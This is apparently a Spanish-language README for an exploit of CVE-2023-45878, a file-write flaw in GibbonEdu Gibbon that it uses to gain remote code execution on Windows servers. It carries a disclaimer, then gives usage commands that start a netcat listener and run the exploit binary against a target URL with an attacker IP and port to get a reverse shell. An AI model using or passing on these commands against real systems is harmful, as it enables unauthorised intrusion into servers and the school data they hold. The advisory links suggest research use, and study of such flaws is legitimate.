
CVE-2023-45878 exploit fácil | reverse shell
GibbonEdu Gibbon versión 25.0.1 y anteriores permite la escritura arbitraria de archivos
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Este exploit se proporciona únicamente con fines educativos y de investigación. El uso no autorizado de este código contra sistemas sin permiso explícito es ilegal y puede violar las leyes de ciberdelincuencia en diversas jurisdicciones. No asumo ninguna responsabilidad por el mal uso o los daños causados por este exploit.
Es responsabilidad del usuario garantizar el cumplimiento de todas las leyes y pautas éticas aplicables antes de ejecutar este código. No utilice este exploit para actividades maliciosas.
Este exploit funciona exclusivamente en Windows Server. Si la versión vulnerable de Gibbon se ejecuta en un servidor Linux, tendrás que modificar el exploit en consecuencia.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> o ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>